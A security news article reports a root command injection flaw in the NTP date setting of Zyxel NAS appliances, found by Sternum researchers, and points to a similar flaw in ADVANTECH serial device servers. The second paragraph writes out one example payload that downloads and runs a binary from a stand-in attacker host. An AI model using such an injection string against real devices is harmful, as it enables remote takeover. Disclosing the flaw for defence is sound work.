Freely subscribe to our NEWSLETTER

The identified Zyxel NAS appliances allow for the storage of user data in a single location, including cloud data, photos, videos, or USB data. Sternum security researchers were in the process of scanning one of the Zyxel NAS units as part of the company’s standard lab deployment process when a “Dangerous String Format” alert was triggered by one of the security logics in the Sternum security platform. When such a pattern is confirmed, Sternum’s software issues an alert with the details of the string format and the executing process name — which identifies the root cause of the issue.

In this situation, there was a problem with a ntpdate_date process, which, as the name suggests, is responsible for periodically synchronizing the device’s internal clock via NTP pings. Knowing that it was passed as a string to ntpdate_date, Sternum researchers investigated further to see if it could be used to manipulate the device. These tests confirmed a vulnerability that could be used by an authenticated user to execute an arbitrary system command with root privileges on the system. This could be used for a more malicious purpose - for example, a remote malware injection could be performed with a string similar to: ;wget$IFSattacker.com/binary;chmod$IFS+x$IFSbinary;./binary.

Applying the patch will fix the issue for Zyxel users, but Sternum researchers believe there may be a more extensive pattern here that needs to be addressed. Researchers point to recent news of a similar vulnerability discovered in ADVANTECH EKI-15XX serial device servers. A different device from a different company could also be compromised by manipulating the NTP server details from the control panel. These instances would not be unique or a rare coincidence, but rather pervasive in devices deployed globally.